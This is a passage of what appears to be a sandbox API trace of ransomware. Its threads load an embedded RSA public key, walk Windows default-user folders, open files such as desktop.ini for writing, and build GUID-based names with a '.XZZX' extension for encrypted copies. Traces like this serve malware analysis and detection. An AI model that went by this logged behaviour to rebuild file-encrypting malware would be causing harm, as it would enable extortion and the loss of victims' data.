lpString2="RecentPlaces.lnk" | out: lpString1="RecentPlaces.lnk") returned="RecentPlaces.lnk" [0206.441] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x496a791b, Data2=0x173d, Data3=0x4a79, Data4=([0]=0xa4, [1]=0x56, [2]=0x43, [3]=0xd7, [4]=0xe5, [5]=0x0, [6]=0x57, [7]=0x29))) returned 0x0 [0206.441] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0206.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0206.441] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\0F40486F06C29DD5496A791B099D821D.XZZX") returned 64 [0206.441] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="XZZX") returned 0x0 [0206.441] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk", dwFileAttributes=0x20) returned 0 [0206.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 816 os_tid = 0xf5c [0206.606] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0206.606] lstrcpyW (in: lpString1=0x2daf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0206.606] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Default\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\") returned="\\\\?\\C:\\Users\\Default\\Music\\" [0206.606] SetErrorMode (uMode=0x1) returned 0x1 [0206.606] lstrcpyW (in: lpString1=0x2daf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0206.606] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x33e7130f, Data2=0xf5f, Data3=0x4d50, Data4=([0]=0xb6, [1]=0xcb, [2]=0x80, [3]=0x31, [4]=0x54, [5]=0x39, [6]=0xa5, [7]=0xf1))) returned 0x0 [0206.606] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0206.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0206.606] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Music\\CCDDF39104A460B033E7130F077F44F8.XZZX") returned 64 [0206.606] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0206.606] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini", dwFileAttributes=0x20) returned 0 [0206.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 817 os_tid = 0xf60 [0206.759] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0206.759] lstrcpyW (in: lpString1=0x2daf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0206.759] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Default\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Pictures\\") returned="\\\\?\\C:\\Users\\Default\\Pictures\\" [0206.759] SetErrorMode (uMode=0x1) returned 0x1 [0206.759] lstrcpyW (in: lpString1=0x2daf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0206.759] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xc297cdb4, Data2=0xba19, Data3=0x455c, Data4=([0]=0xa3, [1]=0xbf, [2]=0xb1, [3]=0x82, [4]=0xfb, [5]=0x12, [6]=0xc1, [7]=0x8d))) returned 0x0 [0206.759] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0206.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0206.759] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Pictures\\4C47DE94326B9DFCC297CDB435468244.XZZX") returned 67 [0206.759] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0206.759] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini", dwFileAttributes=0x20) returned 0 [0206.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 818 os_tid = 0xf64 [0206.913] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0206.913] lstrcpyW (in: lpString1=0x2daf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0206.913] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Default\\Saved Games\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games\\") returned="\\\\?\\C:\\Users\\Default\\Saved Games\\" [0206.913] SetErrorMode (uMode=0x1) returned 0x1 [0206.913] lstrcpyW (in: lpString1=0x2daf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0206.914] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xdcf43c84, Data2=0xa462, Data3=0x48d3, Data4=([0]=0xb9, [1]=0x98, [2]=0x47, [3]=0xe1, [4]=0xa8, [5]=0xf2, [6]=0x8, [7]=0x27))) returned 0x0 [0206.914] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0206.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0206.914] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Saved Games\\0C43BA882EC30CC6DCF43C84319DF10E.XZZX") returned 70 [0206.914] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0206.914] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini", dwFileAttributes=0x20) returned 0 [0206.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 819 os_tid = 0xf68 [0207.071] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0207.071] lstrcpyW (in: lpString1=0x2daf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0207.071] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Default\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\") returned="\\\\?\\C:\\Users\\Default\\Searches\\" [0207.071] SetErrorMode (uMode=0x1) returned 0x1 [0207.071] lstrcpyW (in: lpString1=0x2daf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0207.071] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x711f8b13, Data2=0x6110, Data3=0x4d5b, Data4=([0]=0xb8, [1]=0x8e, [2]=0x3b, [3]=0x77, [4]=0x12, [5]=0x4d, [6]=0xa1, [7]=0x5b))) returned 0x0 [0207.071] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0207.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0207.071] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\05AAE4301D5450B0711F8B13202F34F8.XZZX") returned 67 [0207.071] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0207.071] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini", dwFileAttributes=0x20) returned 0 [0207.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 820 os_tid = 0xf6c [0207.221] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0207.221] lstrcpyW (in: lpString1=0x2daf460, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0207.221] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Default\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\") returned="\\\\?\\C:\\Users\\Default\\Searches\\" [0207.221] SetErrorMode (uMode=0x1) returned 0x1 [0207.221] lstrcpyW (in: lpString1=0x2daf860, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0207.222] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x98c0ff29, Data2=0x417, Data3=0x43a3, Data4=([0]=0x8c, [1]=0x48, [2]=0x45, [3]=0xc0, [4]=0x33, [5]=0xd5, [6]=0x49, [7]=0x27))) returned 0x0 [0207.222] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms") returned 50 [0207.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0207.222] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\BD5390AF01149FA598C0FF2903EF83ED.XZZX") returned 67 [0207.222] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="XZZX") returned 0x0 [0207.222] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms", dwFileAttributes=0x20) returned 0 [0207.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 821 os_tid = 0xf70 [0207.377] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0207.377] lstrcpyW (in: lpString1=0x2daf460, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0207.378] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Default\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\") returned="\\\\?\\C:\\Users\\Default\\Searches\\" [0207.378] SetErrorMode (uMode=0x1) returned 0x1 [0207.378] lstrcpyW (in: lpString1=0x2daf860, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0207.378] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x66214344, Data2=0x8d96, Data3=0x4ff5, Data4=([0]=0x96, [1]=0x57, [2]=0xe1, [3]=0xa3, [4]=0xb1, [5]=0x5d, [6]=0x49, [7]=0xd))) returned 0x0 [0207.378] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms") returned 57 [0207.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0207.378] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\2989DDD82C38CA8E662143442F13AED6.XZZX") returned 67 [0207.378] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="XZZX") returned 0x0 [0207.378] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x20) returned 0 [0207.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 822 os_tid = 0xf74 [0207.549] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0207.549] lstrcpyW (in: lpString1=0x2daf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0207.549] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Default\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Videos\\") returned="\\\\?\\C:\\Users\\Default\\Videos\\" [0207.549] SetErrorMode (uMode=0x1) returned 0x1 [0207.549] lstrcpyW (in: lpString1=0x2daf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0207.549] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xa290c643, Data2=0x1b47, Data3=0x4e7d, Data4=([0]=0x9e, [1]=0xf2, [2]=0xa4, [3]=0xd, [4]=0x9f, [5]=0x3a, [6]=0xca, [7]=0xdb))) returned 0x0 [0207.549] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0207.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0207.549] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Videos\\5B100D95085CF3ABA290C6430B37D7F3.XZZX") returned 65 [0207.549] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0207.549] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini", dwFileAttributes=0x20) returned 0 [0207.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 823 os_tid = 0xf78 [0207.709] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0207.709] lstrcpyW (in: lpString1=0x2daf460, lpString2="9665D59245322DD390020D724953121B.XZZX" | out: lpString1="9665D59245322DD390020D724953121B.XZZX") returned="9665D59245322DD390020D724953121B.XZZX" [0207.709] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\") returned="\\\\?\\C:\\Users\\Public\\" [0207.709] SetErrorMode (uMode=0x1) returned 0x1 [0207.709] lstrcpyW (in: lpString1=0x2daf860, lpString2="9665D59245322DD390020D724953121B.XZZX" | out: lpString1="9665D59245322DD390020D724953121B.XZZX") returned="9665D59245322DD390020D724953121B.XZZX" [0207.709] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x97db30c3, Data2=0xe9ac, Data3=0x4cc5, Data4=([0]=0xbd, [1]=0x71, [2]=0x5f, [3]=0xc5, [4]=0x70, [5]=0xcf, [6]=0x7b, [7]=0x37))) returned 0x0 [0207.710] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\9665D59245322DD390020D724953121B.XZZX") returned 57 [0207.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, 